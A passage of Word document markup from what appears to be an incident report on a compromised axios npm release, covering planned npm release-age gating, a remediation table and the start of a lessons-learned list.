          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">A future release of Node.js v24 is expected to ship with a new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> version that includes a pending feature adding the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>min-release-age-exclude</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> configuration option to pair with its existing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>min-release-age-exclude</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> option. These options provide a package-manager-level defense against zero-day supply chain attacks by natively enforcing a minimum age requirement on packages before they can be installed. Effectively implementing release-age gating that would have prevented this incident entirely (the compromised </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>axios@1.14.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> was live for under 3 hours before being unpublished). We must wait for the pending “exclude” feature for our own internal libraries and Informer plugins to be usable within our own environments and builds.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="100" w:type="dxa"/>
          <w:left w:w="160" w:type="dxa"/>
          <w:bottom w:w="100" w:type="dxa"/>
          <w:right w:w="160" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="450"/>
        <w:gridCol w:w="7740"/>
        <w:gridCol w:w="1170"/>
      </w:tblGrid>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFB5A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="45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57" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="774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58" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Measure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1170" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1A3C6E"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFB59" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFB5E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="45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5B" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="77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5C" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Monitor Node.js 24 release for availability of </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>min-release-age</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>min-release-age-exclude</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="117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5D" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Ongoing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFB62" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="450" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFB5F" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7740" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFB60" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Upon release: upgrade all </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>build</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> servers and code repositories to Node.js 24, upgrade and adapt codebase and dependencies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1170" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFB61" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Planned</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFB66" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="45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63" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="774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64" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Configure </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>min-release-age &amp; min-release-age-exclude</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> across all build servers and code repositories</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1170" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFB65" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Planned</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFB6A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="450" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFB67" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7740" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFB68" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Validate transitive dependency resolution behavior under new configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1170" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFB69" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Planned</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFB6E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="450" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFB6B" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7740" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFB6C" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Incorporate read-</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">only </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>npmrc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> file in distributed builds containing preconfigured new </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>npm</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> feature options</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1170" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFB6D" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Planned</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="278CFB6F" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="6" w:color="ECF0F1"/>
        </w:pBdr>
        <w:spacing w:before="450" w:after="225"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
        </w:rPr>
        <w:t>9. Lessons Learned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFB70" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Transitive dependencies</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> with open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>semver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> ranges remain a vector for supply chain compromise, even when an organization's own dependency declarations are disciplined.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFB71" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Proxy registries are a caching layer, not a security boundary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">. Our Nexus proxy-repository faithfully cached what the public registry served. Without integrity verification, quarantine, or release-age gating policies, a proxy provides availability and performance benefits but does not provide supply chain security. We have determined it is no longer necessary for performance and are removing it. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFB72" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tooling and Infrastructure assessments are too infrequent. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Assessing our tooling infrastructure more frequently would have revealed the Nexus proxy repository was no longer necessary since it no longer has the same magnitude of effect on the performance of our build processes, which was its original purpose in our infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFB73" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
